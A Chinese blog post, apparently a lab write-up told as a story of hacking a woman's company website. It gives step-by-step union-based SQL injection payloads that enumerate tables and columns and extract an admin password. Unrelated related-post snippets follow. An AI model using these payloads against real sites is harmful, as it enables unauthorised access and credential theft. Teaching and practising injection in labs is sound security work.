尤里的復仇 小芳!

2021-10-21 17:34:27 字數 2407 閱讀 9794

tips:

通過sql注入拿到管理員密碼!

尤里正在追女神小芳,在得知小芳開了一家公司後,尤里通過whois查詢發現了小芳公司**

學過一點黑客技術的他,想在女神面前炫炫技。於是他開啟了傳送門(小芳公司**).

第一步,判斷是否存在sql注入漏洞

在**後構造?id=1 and 1=1 ,然後回車

頁面返回正常

再次構造 ?id=1 and 1=2 然後回車

這裡頁面返回異常,初步判斷這裡可能存在乙個sql注入漏洞

第二步:判斷字段數

構造 ?id=1 and 1=1 order by 1 ,然後回車

頁面正常

構造 ?id=1 and 1=1 order by 2 ,然後回車

頁面返回正常

構造 ?id=1 and 1=1 order by 3 ,然後回車

頁面返回異常,判斷欄位數為2

第三步:判斷回顯點

構造 ?id=1 and 1=2 union select 1,2 然後回車

可以看到圖中頁面紅框處顯示數字2,說明我們可以在數字 2 處顯示我們想要的內容

1、查詢當前資料庫名

構造 ?id=1 and 1=2 union select 1,database() 回車

可以看到資料庫名為 maoshe

2、查詢當前資料庫版本

構造 ?id=1 and 1=2 union select 1,version() 回車

3、查詢當前資料庫表名

構造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回車

絕大多數情況下,管理員的賬號密碼都在admin表裡

嘗試後發現還有3個表,分別是

dirs - - limit 1,1

news - - limit 2,1

xss - - limit 3,1

4、查詢欄位名

構造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=『admin』 limit 0,1 回車

嘗試後查出admin表裡有3個字段,分別是

id - - limit 0,1

username - - limit 1,1

password - - limit 2,1

5、查詢字段內容

構造 ?id=1 and 1=2 union select 1,username from admin limit 0,1 回車

構造 ?id=1 and 1=2 union select 1,password from admin limit 0,1 回車

這樣我們就得到了管理員賬號admin和密碼hellohack

除此之外我還檢視了其他表的內容

dirs只有乙個欄位paths,無內容

news有id,content兩個欄位id=1,content欄位內容是正常網頁的內容

xss有id,user,pass三個字段,無內容

本部落格參考並新增自己探索,有興趣的可以前往原站學習。

曾經的小芳,如今的小方

曾經的小芳,如今的小方 村里有個姑娘叫小芳 長得好看又善良 一雙美麗的大眼睛 辮子粗又長 這首歌是否勾起你深埋心底的記憶,是否讓你想起曾經的那個小芳。她溫婉可人,她通情達理,她悉心照料事無鉅細,她呵護備至幾近全能。今天的小方也是如此。有客來訪,你或事出在外或家務纏身,它都可以輕聲細語提醒,又不致錯失...

亞洲的復仇(下)

儲蓄過剩還有另乙個方面的影響,並與隨後一次金融衝擊有關 2000年網際網路泡沫的破滅。後果之一,是大部分高收入國家的企業界積累了大量財務盈餘。換句話說,公司的留存收益已超過其投資。非金融企業成為資金提供者,而不是從銀行和其它資本 商處貸款。一 批重要國家擁有大量儲蓄盈餘,與此同時,非金融企業的資本需...

孫權的復仇技能實現

死亡單位 是孫權 的 即是有復仇技能的孫權死亡 function trig multiboardrevivetimer u conditions takes nothing returns boolean if not getunittypeid getdyingunit u00o then ret...